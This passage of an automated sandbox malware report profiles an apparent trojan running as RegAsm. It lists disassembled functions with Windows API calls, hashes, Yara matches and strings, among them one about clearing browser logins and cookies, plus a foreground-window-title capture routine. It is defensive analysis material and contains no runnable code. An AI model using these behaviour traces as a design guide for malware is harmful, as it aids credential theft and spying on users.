                                                                                                                                                                                                  Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                                  • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                  • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                  • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                                  Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                                                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                                  • API String ID: 3472027048-1236744412
                                                                                                                                                                                                  • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                                                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                                                                                                                                  • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                                                                                                                                  Function 004194FF Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                                                                                                                                  • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                                                                                                                                  • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                                                                                                                                  • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1432082543-0
                                                                                                                                                                                                  • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                                                                                  • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                                                                                                                                                  Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseHandleReadSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3642004256-0
                                                                                                                                                                                                  • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                  • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                                  Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                                                                                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                                                                                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                                  • String ID: [ $ ]
                                                                                                                                                                                                  • API String ID: 3309952895-93608704
                                                                                                                                                                                                  • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                                                                                                                  Function 0041B890 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 188215759-0
                                                                                                                                                                                                  • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                                                                                  • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                                                                                                                                  Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                                                                                                                  Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                                                                                                                  Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandleOpenProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 39102293-0
                                                                                                                                                                                                  • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                                                                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                                                                                                                                  Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                                                                                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                                                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2633735394-0
                                                                                                                                                                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                                                                                                                  Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4116985748-0
                                                                                                                                                                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                                                                                                                  Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                                                                                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                                                                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                                                                                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                                                                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1761009282-0
                                                                                                                                                                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                                                                                                  Function 00450939 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0045093D
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450943
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045094C
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450955
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                  • Opcode ID: dec51a3efd7bded7d617a6265d0dbd7c574832b93fdfeb293186f1478fd3d20a
                                                                                                                                                                                                  • Instruction ID: 6c466447fda19c259de864e8ec7a337f5d427e247863835a27fd62ee48361464
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dec51a3efd7bded7d617a6265d0dbd7c574832b93fdfeb293186f1478fd3d20a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5D0C9FAD01204B7EB00F6F5889384D632C6E15304B520C46B90166103D67C9A00473A
                                                                                                                                                                                                  Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                                                                                  Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 1000655C
                                                                                                                                                                                                    • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                                                    • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                                                    • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                  • API String ID: 2667617558-3972193922
                                                                                                                                                                                                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                  • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                                                  Function 0044569C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                  Download Yara Rule
